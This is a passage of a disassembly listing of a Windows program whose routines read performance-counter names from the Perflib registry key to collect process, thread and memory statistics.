[ebp+var_18] 3617246E mov esi, offset byte_3617D618 36172473 push eax 36172474 push offset aS ; "\\\\%s" 36172479 push esi 3617247A call ds:sprintf 36172480 add esp, 0Ch 36172483 push esi 36172484 push offset byte_3617D62C 36172489 call ds:lstrcpyA 3617248F 3617248F loc_3617248F: ; CODE XREF: sub_361723F1+78j 3617248F pop edi 36172490 pop esi 36172491 pop ebx 36172492 leave 36172493 retn 36172493 sub_361723F1 endp 36172493 36172494 36172494 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 
36172494 36172494 ; Attributes: bp-based frame 36172494 36172494 sub_36172494 proc near ; CODE XREF: sub_36172278+5p 36172494 36172494 var_C = dword ptr -0Ch 36172494 var_8 = dword ptr -8 36172494 var_4 = dword ptr -4 36172494 36172494 push ebp 36172495 mov ebp, esp 36172497 sub esp, 0Ch 3617249A lea eax, [ebp+var_8] 3617249D push eax 3617249E lea eax, [ebp+var_4] 361724A1 push eax 361724A2 lea eax, [ebp+var_C] 361724A5 push eax 361724A6 push dword_36179484 361724AC push dword_36179488 361724B2 call sub_36172AE2 361724B7 add esp, 14h 361724BA test eax, eax 361724BC jz short loc_361724C3 361724BE or eax, 0FFFFFFFFh 361724C1 leave 361724C2 retn 361724C3 ; ─────────────────────────────────────────────────────────────────────────── 361724C3 361724C3 loc_361724C3: ; CODE XREF: sub_36172494+28j 361724C3 push ebx 361724C4 push esi 361724C5 push edi 361724C6 push offset aProcess ; "Process" 361724CB push [ebp+var_8] 361724CE push [ebp+var_4] 361724D1 call sub_36172C91 361724D6 push offset aProcessorTime ; "% Processor Time" 361724DB mov dword_3617D5C8, eax 361724E0 push [ebp+var_8] 361724E3 push [ebp+var_4] 361724E6 call sub_36172C91 361724EB push offset aPrivilegedTime ; "% Privileged Time" 361724F0 mov dword_3617D5C4, eax 361724F5 push [ebp+var_8] 361724F8 push [ebp+var_4] 361724FB call sub_36172C91 36172500 mov ebx, offset aUserTime ; "% User Time" 36172505 mov dword_3617D5C0, eax 3617250A push ebx 3617250B push [ebp+var_8] 3617250E push [ebp+var_4] 36172511 call sub_36172C91 36172516 push offset aWorkingSet ; "Working Set" 3617251B mov dword_3617D5BC, eax 36172520 push [ebp+var_8] 36172523 push [ebp+var_4] 36172526 call sub_36172C91 3617252B push offset aWorkingSetPeak ; "Working Set Peak" 36172530 mov dword_3617D5B8, eax 36172535 push [ebp+var_8] 36172538 push [ebp+var_4] 3617253B call sub_36172C91 36172540 add esp, 48h 36172543 mov edi, offset aPriorityBase ; "Priority Base" 36172548 mov dword_3617D5B4, eax 3617254D push edi 3617254E push [ebp+var_8] 36172551 push 
[ebp+var_4] 36172554 call sub_36172C91 36172559 mov esi, offset aElapsedTime ; "Elapsed Time" 3617255E mov dword_3617D5B0, eax 36172563 push esi 36172564 push [ebp+var_8] 36172567 push [ebp+var_4] 3617256A call sub_36172C91 3617256F push offset aIdProcess ; "ID Process" 36172574 mov dword_3617D5AC, eax 36172579 push [ebp+var_8] 3617257C push [ebp+var_4] 3617257F call sub_36172C91 36172584 push offset aPrivateBytes ; "Private Bytes" 36172589 mov dword_3617D5A8, eax 3617258E push [ebp+var_8] 36172591 push [ebp+var_4] 36172594 call sub_36172C91 36172599 push offset aVirtualBytes ; "Virtual Bytes" 3617259E mov dword_3617D5A4, eax 361725A3 push [ebp+var_8] 361725A6 push [ebp+var_4] 361725A9 call sub_36172C91 361725AE push offset aVirtualBytesPe ; "Virtual Bytes Peak" 361725B3 mov dword_3617D5A0, eax 361725B8 push [ebp+var_8] 361725BB push [ebp+var_4] 361725BE call sub_36172C91 361725C3 add esp, 48h 361725C6 mov dword_3617D59C, eax 361725CB push offset aPageFaultsSec ; "Page Faults/sec" 361725D0 push [ebp+var_8] 361725D3 push [ebp+var_4] 361725D6 call sub_36172C91 361725DB push offset aThread ; "Thread" 361725E0 mov dword_3617D598, eax 361725E5 push [ebp+var_8] 361725E8 push [ebp+var_4] 361725EB call sub_36172C91 361725F0 push offset aProcessorTime ; "% Processor Time" 361725F5 mov dword_3617D570, eax 361725FA push [ebp+var_8] 361725FD push [ebp+var_4] 36172600 call sub_36172C91 36172605 push offset aPrivilegedTime ; "% Privileged Time" 3617260A mov dword_3617D56C, eax 3617260F push [ebp+var_8] 36172612 push [ebp+var_4] 36172615 call sub_36172C91 3617261A push ebx 3617261B mov dword_3617D568, eax 36172620 push [ebp+var_8] 36172623 push [ebp+var_4] 36172626 call sub_36172C91 3617262B push offset aStartAddress ; "Start Address" 36172630 mov dword_3617D564, eax 36172635 push [ebp+var_8] 36172638 push [ebp+var_4] 3617263B call sub_36172C91 36172640 add esp, 48h 36172643 mov dword_3617D560, eax 36172648 push offset aContextSwitche ; "Context Switches/sec" 3617264D push 
[ebp+var_8] 36172650 push [ebp+var_4] 36172653 call sub_36172C91 36172658 push offset aPriorityCurren ; "Priority Current" 3617265D mov dword_3617D55C, eax 36172662 push [ebp+var_8] 36172665 push [ebp+var_4] 36172668 call sub_36172C91 3617266D push edi 3617266E mov dword_3617D558, eax 36172673 push [ebp+var_8] 36172676 push [ebp+var_4] 36172679 call sub_36172C91 3617267E push esi 3617267F mov dword_3617D554, eax 36172684 push [ebp+var_8] 36172687 push [ebp+var_4] 3617268A call sub_36172C91 3617268F push offset aIdThread ; "ID Thread" 36172694 mov dword_3617D550, eax 36172699 push [ebp+var_8] 3617269C push [ebp+var_4] 3617269F call sub_36172C91 361726A4 push offset aThreadDetails ; "Thread Details" 361726A9 mov dword_3617D54C, eax 361726AE push [ebp+var_8] 361726B1 push [ebp+var_4] 361726B4 call sub_36172C91 361726B9 add esp, 48h 361726BC mov dword_3617D548, eax 361726C1 push offset aUserPc ; "User PC" 361726C6 push [ebp+var_8] 361726C9 push [ebp+var_4] 361726CC call sub_36172C91 361726D1 push offset aImage ; "Image" 361726D6 mov dword_3617D544, eax 361726DB push [ebp+var_8] 361726DE push [ebp+var_4] 361726E1 call sub_36172C91 361726E6 push offset aNoAccess ; "No Access" 361726EB mov dword_3617D540, eax 361726F0 push [ebp+var_8] 361726F3 push [ebp+var_4] 361726F6 call sub_36172C91 361726FB push offset aReadOnly ; "Read Only" 36172700 mov dword_3617D53C, eax 36172705 push [ebp+var_8] 36172708 push [ebp+var_4] 3617270B call sub_36172C91 36172710 push offset aReadWrite ; "Read/Write" 36172715 mov dword_3617D538, eax 3617271A push [ebp+var_8] 3617271D push [ebp+var_4] 36172720 call sub_36172C91 36172725 push offset aWriteCopy ; "Write Copy" 3617272A mov dword_3617D534, eax 3617272F push [ebp+var_8] 36172732 push [ebp+var_4] 36172735 call sub_36172C91 3617273A add esp, 48h 3617273D mov dword_3617D530, eax 36172742 push offset aExecutable ; "Executable" 36172747 push [ebp+var_8] 3617274A push [ebp+var_4] 3617274D call sub_36172C91 36172752 push offset aExecReadOnly ; 
"Exec Read Only" 36172757 mov dword_3617D52C, eax 3617275C push [ebp+var_8] 3617275F push [ebp+var_4] 36172762 call sub_36172C91 36172767 push offset aExecReadWrite ; "Exec Read/Write" 3617276C mov dword_3617D528, eax 36172771 push [ebp+var_8] 36172774 push [ebp+var_4] 36172777 call sub_36172C91 3617277C push offset aExecWriteCopy ; "Exec Write Copy" 36172781 mov dword_3617D524, eax 36172786 push [ebp+var_8] 36172789 push [ebp+var_4] 3617278C call sub_36172C91 36172791 push offset aProcessAddress ; "Process Address Space" 36172796 mov dword_3617D520, eax 3617279B push [ebp+var_8] 3617279E push [ebp+var_4] 361727A1 call sub_36172C91 361727A6 push offset aReservedSpaceN ; "Reserved Space No Access" 361727AB mov dword_3617D51C, eax 361727B0 push [ebp+var_8] 361727B3 push [ebp+var_4] 361727B6 call sub_36172C91 361727BB add esp, 48h 361727BE mov dword_3617D518, eax 361727C3 push offset aReservedSpaceR ; "Reserved Space Read Only" 361727C8 push [ebp+var_8] 361727CB push [ebp+var_4] 361727CE call sub_36172C91 361727D3 push offset aReservedSpac_0 ; "Reserved Space Read/Write" 361727D8 mov dword_3617D514, eax 361727DD push [ebp+var_8] 361727E0 push [ebp+var_4] 361727E3 call sub_36172C91 361727E8 push offset aReservedSpaceW ; "Reserved Space Write Copy" 361727ED mov dword_3617D510, eax 361727F2 push [ebp+var_8] 361727F5 push [ebp+var_4] 361727F8 call sub_36172C91 361727FD push offset aReservedSpaceE ; "Reserved Space Executable" 36172802 mov dword_3617D50C, eax 36172807 push [ebp+var_8] 3617280A push [ebp+var_4] 3617280D call sub_36172C91 36172812 push offset aReservedSpac_1 ; "Reserved Space Exec Read Only" 36172817 mov dword_3617D508, eax 3617281C push [ebp+var_8] 3617281F push [ebp+var_4] 36172822 call sub_36172C91 36172827 push offset aReservedSpac_2 ; "Reserved Space Exec Read/Write" 3617282C mov dword_3617D504, eax 36172831 push [ebp+var_8] 36172834 push [ebp+var_4] 36172837 call sub_36172C91 3617283C add esp, 48h 3617283F mov dword_3617D500, eax 36172844 push offset 
aReservedSpac_3 ; "Reserved Space Exec Write Copy" 36172849 push [ebp+var_8] 3617284C push [ebp+var_4] 3617284F call sub_36172C91 36172854 push offset aMappedSpaceNoA ; "Mapped Space No Access" 36172859 mov dword_3617D4FC, eax 3617285E push [ebp+var_8] 36172861 push [ebp+var_4] 36172864 call sub_36172C91 36172869 push offset aMappedSpaceRea ; "Mapped Space Read Only" 3617286E mov dword_3617D4F8, eax 36172873 push [ebp+var_8] 36172876 push [ebp+var_4] 36172879 call sub_36172C91 3617287E push offset aMappedSpaceR_0 ; "Mapped Space Read/Write" 36172883 mov dword_3617D4F4, eax 36172888 push [ebp+var_8] 3617288B push [ebp+var_4] 3617288E call sub_36172C91 36172893 mov dword_3617D4F0, eax 36172898 push offset aMappedSpaceWri ; "Mapped Space Write Copy" 3617289D push [ebp+var_8] 361728A0 push [ebp+var_4] 361728A3 call sub_36172C91 361728A8 push offset aMappedSpaceExe ; "Mapped Space Executable" 361728AD mov dword_3617D4EC, eax 361728B2 push [ebp+var_8] 361728B5 push [ebp+var_4] 361728B8 call sub_36172C91 361728BD add esp, 48h 361728C0 mov dword_3617D4E8, eax 361728C5 push offset aMappedSpaceE_0 ; "Mapped Space Exec Read Only" 361728CA push [ebp+var_8] 361728CD push [ebp+var_4] 361728D0 call sub_36172C91 361728D5 push offset aMappedSpaceE_1 ; "Mapped Space Exec Read/Write" 361728DA mov dword_3617D4E4, eax 361728DF push [ebp+var_8] 361728E2 push [ebp+var_4] 361728E5 call sub_36172C91 361728EA push offset aMappedSpaceE_2 ; "Mapped Space Exec Write Copy" 361728EF mov dword_3617D4E0, eax 361728F4 push [ebp+var_8] 361728F7 push [ebp+var_4] 361728FA call sub_36172C91 361728FF push offset aImageSpaceNoAc ; "Image Space No Access" 36172904 mov dword_3617D4DC, eax 36172909 push [ebp+var_8] 3617290C push [ebp+var_4] 3617290F call sub_36172C91 36172914 push offset aImageSpaceRead ; "Image Space Read Only" 36172919 mov dword_3617D4D8, eax 3617291E push [ebp+var_8] 36172921 push [ebp+var_4] 36172924 call sub_36172C91 36172929 push offset aImageSpaceRe_0 ; "Image Space Read/Write" 
3617292E mov dword_3617D4D4, eax 36172933 push [ebp+var_8] 36172936 push [ebp+var_4] 36172939 call sub_36172C91 3617293E add esp, 48h 36172941 mov dword_3617D4D0, eax 36172946 push offset aImageSpaceWrit ; "Image Space Write Copy" 3617294B push [ebp+var_8] 3617294E push [ebp+var_4] 36172951 call sub_36172C91 36172956 push offset aImageSpaceExec ; "Image Space Executable" 3617295B mov dword_3617D4CC, eax 36172960 push [ebp+var_8] 36172963 push [ebp+var_4] 36172966 call sub_36172C91 3617296B push offset aImageSpaceEx_0 ; "Image Space Exec Read Only" 36172970 mov dword_3617D4C8, eax 36172975 push [ebp+var_8] 36172978 push [ebp+var_4] 3617297B call sub_36172C91 36172980 push offset aImageSpaceEx_1 ; "Image Space Exec Read/Write" 36172985 mov dword_3617D4C4, eax 3617298A push [ebp+var_8] 3617298D push [ebp+var_4] 36172990 call sub_36172C91 36172995 push offset aImageSpaceEx_2 ; "Image Space Exec Write Copy" 3617299A mov dword_3617D4C0, eax 3617299F push [ebp+var_8] 361729A2 push [ebp+var_4] 361729A5 call sub_36172C91 361729AA push dword_3617D570 361729B0 mov esi, ds:sprintf 361729B6 mov dword_3617D4BC, eax 361729BB push dword_3617D5C8 361729C1 push offset aLdLd ; "%ld %ld" 361729C6 push offset byte_3617D604 361729CB call esi ; sprintf 361729CD add esp, 4Ch 361729D0 push dword_3617D548 361729D6 push dword_3617D540 361729DC push dword_3617D51C 361729E2 push offset aLdLdLd ; "%ld %ld %ld" 361729E7 push offset byte_3617D5E4 361729EC call esi ; sprintf 361729EE add esp, 14h 361729F1 push [ebp+var_C] 361729F4 mov esi, ds:LocalFree 361729FA call esi ; LocalFree 361729FC push [ebp+var_4] 361729FF call esi ; LocalFree 36172A01 pop edi 36172A02 pop esi 36172A03 xor eax, eax 36172A05 pop ebx 36172A06 leave 36172A07 retn 36172A07 sub_36172494 endp 36172A07 36172A08 36172A08 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A08 36172A08 ; Attributes: bp-based frame 36172A08 36172A08 sub_36172A08 proc near ; CODE XREF: .text:361722ABp 36172A08 
36172A08 arg_0 = dword ptr 8 36172A08 arg_4 = dword ptr 0Ch 36172A08 arg_8 = dword ptr 10h 36172A08 arg_C = dword ptr 14h 36172A08 36172A08 push ebp 36172A09 mov ebp, esp 36172A0B push [ebp+arg_C] 36172A0E lea eax, [ebp+arg_8] 36172A11 push eax 36172A12 push [ebp+arg_4] 36172A15 push [ebp+arg_0] 36172A18 call sub_36172CC1 36172A1D add esp, 10h 36172A20 neg eax 36172A22 sbb eax, eax 36172A24 not eax 36172A26 and eax, [ebp+arg_8] 36172A29 pop ebp 36172A2A retn 36172A2A sub_36172A08 endp 36172A2A 36172A2B 36172A2B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A2B 36172A2B 36172A2B sub_36172A2B proc near ; CODE XREF: .text:361722BDp 36172A2B ; .text:3617235Ap 36172A2B 36172A2B arg_0 = dword ptr 8 36172A2B arg_4 = dword ptr 0Ch 36172A2B 36172A2B push esi 36172A2C mov esi, [esp+arg_0] 36172A30 push edi 36172A31 push esi 36172A32 xor edi, edi 36172A34 call sub_36172D40 36172A39 cmp eax, edi 36172A3B pop ecx 36172A3C jz short loc_36172A59 36172A3E cmp [esi+1Ch], edi 36172A41 jbe short loc_36172A59 36172A43 36172A43 loc_36172A43: ; CODE XREF: sub_36172A2B+2Cj 36172A43 mov ecx, [eax+0Ch] 36172A46 cmp ecx, [esp+4+arg_4] 36172A4A jz short loc_36172A5B 36172A4C push eax 36172A4D call sub_36172D51 36172A52 inc edi 36172A53 pop ecx 36172A54 cmp edi, [esi+1Ch] 36172A57 jb short loc_36172A43 36172A59 36172A59 loc_36172A59: ; CODE XREF: sub_36172A2B+11j 36172A59 ; sub_36172A2B+16j 36172A59 xor eax, eax 36172A5B 36172A5B loc_36172A5B: ; CODE XREF: sub_36172A2B+1Fj 36172A5B pop edi 36172A5C pop esi 36172A5D retn 36172A5D sub_36172A2B endp 36172A5D 36172A5E 36172A5E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A5E 36172A5E 36172A5E sub_36172A5E proc near ; CODE XREF: .text:361722CCp 36172A5E ; .text:36172369p 36172A5E 36172A5E arg_0 = dword ptr 8 36172A5E arg_4 = dword ptr 0Ch 36172A5E 36172A5E push esi 36172A5F mov esi, [esp+arg_0] 36172A63 push edi 36172A64 push esi 36172A65 xor edi, edi 36172A67 call 
sub_36172D61 36172A6C cmp eax, edi 36172A6E pop ecx 36172A6F jz short loc_36172A8C 36172A71 cmp [esi+20h], edi 36172A74 jbe short loc_36172A8C 36172A76 36172A76 loc_36172A76: ; CODE XREF: sub_36172A5E+2Cj 36172A76 mov ecx, [eax+4] 36172A79 cmp ecx, [esp+4+arg_4] 36172A7D jz short loc_36172A8E 36172A7F push eax 36172A80 call sub_36172D51 36172A85 inc edi 36172A86 pop ecx 36172A87 cmp edi, [esi+20h] 36172A8A jb short loc_36172A76 36172A8C 36172A8C loc_36172A8C: ; CODE XREF: sub_36172A5E+11j 36172A8C ; sub_36172A5E+16j 36172A8C xor eax, eax 36172A8E 36172A8E loc_36172A8E: ; CODE XREF: sub_36172A5E+1Fj 36172A8E pop edi 36172A8F pop esi 36172A90 retn 36172A90 sub_36172A5E endp 36172A90 36172A91 36172A91 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A91 36172A91 36172A91 sub_36172A91 proc near ; CODE XREF: .text:361722DDp 36172A91 ; .text:36172374p 36172A91 36172A91 arg_0 = dword ptr 4 36172A91 36172A91 mov ecx, [esp+arg_0] 36172A95 test ecx, ecx 36172A97 jz short loc_36172A9F 36172A99 mov eax, [ecx+4] 36172A9C add eax, ecx 36172A9E retn 36172A9F ; ─────────────────────────────────────────────────────────────────────────── 36172A9F 36172A9F loc_36172A9F: ; CODE XREF: sub_36172A91+6j 36172A9F xor eax, eax 36172AA1 retn 36172AA1 sub_36172A91 endp 36172AA1 36172AA2 36172AA2 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172AA2 36172AA2 36172AA2 sub_36172AA2 proc near ; CODE XREF: .text:36172319p 36172AA2 ; .text:361723CCp 36172AA2 36172AA2 arg_0 = dword ptr 4 36172AA2 arg_4 = dword ptr 8 36172AA2 36172AA2 mov eax, [esp+arg_4] 36172AA6 test eax, eax 36172AA8 jz short loc_36172ABA 36172AAA mov ecx, [esp+arg_0] 36172AAE test ecx, ecx 36172AB0 jz short loc_36172ABA 36172AB2 mov eax, [eax+24h] 36172AB5 add eax, [ecx] 36172AB7 add eax, ecx 36172AB9 retn 36172ABA ; ─────────────────────────────────────────────────────────────────────────── 36172ABA 36172ABA loc_36172ABA: ; CODE XREF: sub_36172AA2+6j 36172ABA ; 
sub_36172AA2+Ej 36172ABA xor eax, eax 36172ABC retn 36172ABC sub_36172AA2 endp 36172ABC 36172ABD 36172ABD ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172ABD 36172ABD 36172ABD sub_36172ABD proc near ; CODE XREF: .text:36172323p 36172ABD 36172ABD arg_0 = dword ptr 4 36172ABD 36172ABD mov ecx, [esp+arg_0] 36172AC1 test ecx, ecx 36172AC3 jz short loc_36172ACB 36172AC5 mov eax, [ecx+10h] 36172AC8 add eax, ecx 36172ACA retn 36172ACB ; ─────────────────────────────────────────────────────────────────────────── 36172ACB 36172ACB loc_36172ACB: ; CODE XREF: sub_36172ABD+6j 36172ACB xor eax, eax 36172ACD retn 36172ACD sub_36172ABD endp 36172ACD 36172ACE 36172ACE ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172ACE 36172ACE 36172ACE sub_36172ACE proc near ; CODE XREF: .text:3617233Cp 36172ACE ; .text:361723D8p 36172ACE 36172ACE arg_0 = dword ptr 4 36172ACE 36172ACE mov eax, [esp+arg_0] 36172AD2 test eax, eax 36172AD4 jz short loc_36172ADF 36172AD6 mov ecx, [eax] 36172AD8 add ecx, eax 36172ADA mov eax, [ecx] 36172ADC add eax, ecx 36172ADE retn 36172ADF ; ─────────────────────────────────────────────────────────────────────────── 36172ADF 36172ADF loc_36172ADF: ; CODE XREF: sub_36172ACE+6j 36172ADF xor eax, eax 36172AE1 retn 36172AE1 sub_36172ACE endp 36172AE1 36172AE2 36172AE2 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172AE2 36172AE2 ; Attributes: bp-based frame 36172AE2 36172AE2 sub_36172AE2 proc near ; CODE XREF: sub_36172494+1Ep 36172AE2 36172AE2 var_18 = byte ptr -18h 36172AE2 var_14 = dword ptr -14h 36172AE2 var_10 = byte ptr -10h 36172AE2 var_C = dword ptr -0Ch 36172AE2 var_8 = dword ptr -8 36172AE2 var_4 = dword ptr -4 36172AE2 arg_0 = dword ptr 8 36172AE2 arg_4 = dword ptr 0Ch 36172AE2 arg_8 = dword ptr 10h 36172AE2 arg_C = dword ptr 14h 36172AE2 arg_10 = dword ptr 18h 36172AE2 36172AE2 push ebp 36172AE3 mov ebp, esp 36172AE5 sub esp, 18h 36172AE8 mov ecx, 
[ebp+arg_C] 36172AEB push ebx 36172AEC push esi 36172AED mov esi, [ebp+arg_8] 36172AF0 xor eax, eax 36172AF2 push edi 36172AF3 mov [esi], eax 36172AF5 mov [ecx], eax 36172AF7 lea ecx, [ebp+var_8] 36172AFA mov edi, ds:RegOpenKeyExA 36172B00 mov ebx, 20019h 36172B05 push ecx 36172B06 push ebx 36172B07 push eax 36172B08 push offset aSoftwareMicr_1 ; "software\\microsoft\\windows nt\\currentve"... 36172B0D mov [ebp+var_8], eax 36172B10 push [ebp+arg_0] 36172B13 mov [ebp+var_C], eax 36172B16 call edi ; RegOpenKeyExA 36172B18 test eax, eax 36172B1A mov [ebp+arg_8], eax 36172B1D jnz loc_36172BF2 36172B23 lea eax, [ebp+var_4] 36172B26 mov [ebp+var_4], 4 36172B2D push eax 36172B2E lea eax, [ebp+var_10] 36172B31 push [ebp+arg_10] 36172B34 push eax 36172B35 push 0 36172B37 push offset aLastCounter ; "Last Counter" 36172B3C push [ebp+var_8] 36172B3F call ds:RegQueryValueExA 36172B45 test eax, eax 36172B47 mov [ebp+arg_8], eax 36172B4A jnz loc_36172BF2 36172B50 lea eax, [ebp+var_4] 36172B53 push eax 36172B54 lea eax, [ebp+var_18] 36172B57 push eax 36172B58 lea eax, [ebp+var_10] 36172B5B push eax 36172B5C push 0 36172B5E push offset aVersion ; "Version" 36172B63 push [ebp+var_8] 36172B66 call ds:RegQueryValueExA 36172B6C test eax, eax 36172B6E jz short loc_36172B91 36172B70 lea eax, [ebp+var_C] 36172B73 mov [ebp+var_14], offset aCounters ; "Counters" 36172B7A push eax 36172B7B push ebx 36172B7C push 0 36172B7E push offset aSoftwareMicr_2 ; "software\\microsoft\\windows nt\\currentve"... 
36172B83 push [ebp+arg_0] 36172B86 call edi ; RegOpenKeyExA 36172B88 test eax, eax 36172B8A mov [ebp+arg_8], eax 36172B8D jnz short loc_36172BF2 36172B8F jmp short loc_36172B9E 36172B91 ; ─────────────────────────────────────────────────────────────────────────── 36172B91 36172B91 loc_36172B91: ; CODE XREF: sub_36172AE2+8Cj 36172B91 mov eax, [ebp+arg_4] 36172B94 mov [ebp+var_14], offset aCounter009 ; "Counter 009" 36172B9B mov [ebp+var_C], eax 36172B9E 36172B9E loc_36172B9E: ; CODE XREF: sub_36172AE2+ADj 36172B9E lea eax, [ebp+var_4] 36172BA1 mov ebx, ds:RegQueryValueExA 36172BA7 push eax 36172BA8 lea eax, [ebp+var_10] 36172BAB push 0 36172BAD push eax 36172BAE push 0 36172BB0 push [ebp+var_14] 36172BB3 push [ebp+var_C] 36172BB6 call ebx ; RegQueryValueExA 36172BB8 test eax, eax 36172BBA mov [ebp+arg_8], eax 36172BBD jnz short loc_36172BF2 36172BBF push [ebp+var_4] 36172BC2 mov edi, ds:LocalAlloc 36172BC8 push eax 36172BC9 call edi ; LocalAlloc 36172BCB test eax, eax 36172BCD mov [esi], eax 36172BCF jz short loc_36172BEB 36172BD1 mov eax, [ebp+arg_10] 36172BD4 mov eax, [eax] 36172BD6 lea eax, ds:4[eax*4] 36172BDD push eax 36172BDE push 40h 36172BE0 call edi ; LocalAlloc 36172BE2 mov ecx, [ebp+arg_C] 36172BE5 test eax, eax 36172BE7 mov [ecx], eax 36172BE9 jnz short loc_36172C35 36172BEB 36172BEB loc_36172BEB: ; CODE XREF: sub_36172AE2+EDj 36172BEB mov [ebp+arg_8], 8 36172BF2 36172BF2 loc_36172BF2: ; CODE XREF: sub_36172AE2+3Bj 36172BF2 ; sub_36172AE2+68j ... 36172BF2 mov esi, [esi] 36172BF4 mov edi, ds:LocalFree 36172BFA test esi, esi 36172BFC jz short loc_36172C01 36172BFE push esi 36172BFF call edi ; LocalFree 36172C01 36172C01 loc_36172C01: ; CODE XREF: sub_36172AE2+11Aj 36172C01 mov eax, [ebp+arg_C] 36172C04 mov eax, [eax] 36172C06 test eax, eax 36172C08 jz short loc_36172C0D 36172C0A push eax 36172C0B call edi ; LocalFree 36172C0D 36172C0D loc_36172C0D: ; CODE XREF: sub_36172AE2+126j 36172C0D ; sub_36172AE2+17Dj ... 
36172C0D cmp [ebp+var_8], 0 36172C11 mov esi, ds:RegCloseKey 36172C17 jz short loc_36172C1E 36172C19 push [ebp+var_8] 36172C1C call esi ; RegCloseKey 36172C1E 36172C1E loc_36172C1E: ; CODE XREF: sub_36172AE2+135j 36172C1E mov eax, [ebp+var_C] 36172C21 test eax, eax 36172C23 jz short loc_36172C2D 36172C25 cmp eax, [ebp+arg_4] 36172C28 jz short loc_36172C2D 36172C2A push eax 36172C2B call esi ; RegCloseKey 36172C2D 36172C2D loc_36172C2D: ; CODE XREF: sub_36172AE2+141j 36172C2D ; sub_36172AE2+146j 36172C2D mov eax, [ebp+arg_8] 36172C30 pop edi 36172C31 pop esi 36172C32 pop ebx 36172C33 leave 36172C34 retn 36172C35 ; ─────────────────────────────────────────────────────────────────────────── 36172C35 36172C35 loc_36172C35: ; CODE XREF: sub_36172AE2+107j 36172C35 lea eax, [ebp+var_4] 36172C38 push eax 36172C39 lea eax, [ebp+var_10] 36172C3C push dword ptr [esi] 36172C3E push eax 36172C3F push 0 36172C41 push [ebp+var_14] 36172C44 push [ebp+var_C] 36172C47 call ebx ; RegQueryValueExA 36172C49 test eax, eax 36172C4B mov [ebp+arg_8], eax 36172C4E jnz short loc_36172BF2 36172C50 mov esi, [esi] 36172C52 mov edi, ds:lstrlenA 36172C58 push esi 36172C59 call edi ; lstrlenA 36172C5B mov ebx, eax 36172C5D test ebx, ebx 36172C5F jz short loc_36172C0D 36172C61 36172C61 loc_36172C61: ; CODE XREF: sub_36172AE2+1A8j 36172C61 push esi 36172C62 call ds:atoi 36172C68 pop ecx 36172C69 lea esi, [esi+ebx+1] 36172C6D mov ecx, [ebp+arg_10] 36172C70 cmp eax, [ecx] 36172C72 ja short loc_36172C7C 36172C74 mov ecx, [ebp+arg_C] 36172C77 mov ecx, [ecx] 36172C79 mov [ecx+eax*4], esi 36172C7C 36172C7C loc_36172C7C: ; CODE XREF: sub_36172AE2+190j 36172C7C push esi 36172C7D call edi ; lstrlenA 36172C7F lea esi, [esi+eax+1] 36172C83 push esi 36172C84 call edi ; lstrlenA 36172C86 mov ebx, eax 36172C88 test ebx, ebx 36172C8A jnz short loc_36172C61 36172C8C jmp loc_36172C0D 36172C8C sub_36172AE2 endp 36172C8C 36172C91 36172C91 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 
36172C91 36172C91 36172C91 sub_36172C91 proc near ; CODE XREF: sub_36172494+3Dp 36172C91 ; sub_36172494+52p ... 36172C91 36172C91 arg_0 = dword ptr 8 36172C91 arg_4 = dword ptr 0Ch 36172C91 arg_8 = dword ptr 10h 36172C91 36172C91 push esi 36172C92 mov esi, [esp+arg_0] 36172C96 push edi 36172C97 xor edi, edi 36172C99 36172C99 loc_36172C99: ; CODE XREF: sub_36172C91+25j 36172C99 mov eax, [esi] 36172C9B test eax, eax 36172C9D jz short loc_36172CAE 36172C9F push [esp+4+arg_8] 36172CA3 push eax 36172CA4 call ds:lstrcmpiA 36172CAA test eax, eax 36172CAC jz short loc_36172CBD 36172CAE 36172CAE loc_36172CAE: ; CODE XREF: sub_36172C91+Cj 36172CAE inc edi 36172CAF add esi, 4 36172CB2 cmp edi, [esp+4+arg_4] 36172CB6 jbe short loc_36172C99 36172CB8 xor eax, eax 36172CBA 36172CBA loc_36172CBA: ; CODE XREF: sub_36172C91+2Ej 36172CBA pop edi 36172CBB pop esi 36172CBC retn 36172CBD ; ─────────────────────────────────────────────────────────────────────────── 36172CBD 36172CBD loc_36172CBD: ; CODE XREF: sub_36172C91+1Bj 36172CBD mov eax, edi 36172CBF jmp short loc_36172CBA 36172CBF sub_36172C91 endp 36172CBF 36172CC1 36172CC1 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172CC1 36172CC1 ; Attributes: bp-based frame 36172CC1 36172CC1 sub_36172CC1 proc near ; CODE XREF: sub_36172A08+10p 36172CC1 36172CC1 var_4 = byte ptr -4 36172CC1 arg_0 = dword ptr 8 36172CC1 arg_4 = dword ptr 0Ch 36172CC1 arg_8 = dword ptr 10h 36172CC1 arg_C = dword ptr 14h 36172CC1 36172CC1 push ebp 36172CC2 mov ebp, esp 36172CC4 push ecx 36172CC5 push ebx 36172CC6 push esi 36172CC7 mov esi, [ebp+arg_8] 36172CCA push edi 36172CCB mov edi, [ebp+arg_C] 36172CCE cmp dword ptr [esi], 0 36172CD1 jnz short loc_36172CDF 36172CD3 push dword ptr [edi] 36172CD5 push 0 36172CD7 call ds:LocalAlloc 36172CDD mov [esi], eax 36172CDF 36172CDF loc_36172CDF: ; CODE XREF: sub_36172CC1+10j 36172CDF mov ebx, 0EAh 36172CE4 36172CE4 loc_36172CE4: ; CODE XREF: sub_36172CC1+6Dj 36172CE4 mov eax, [edi] 
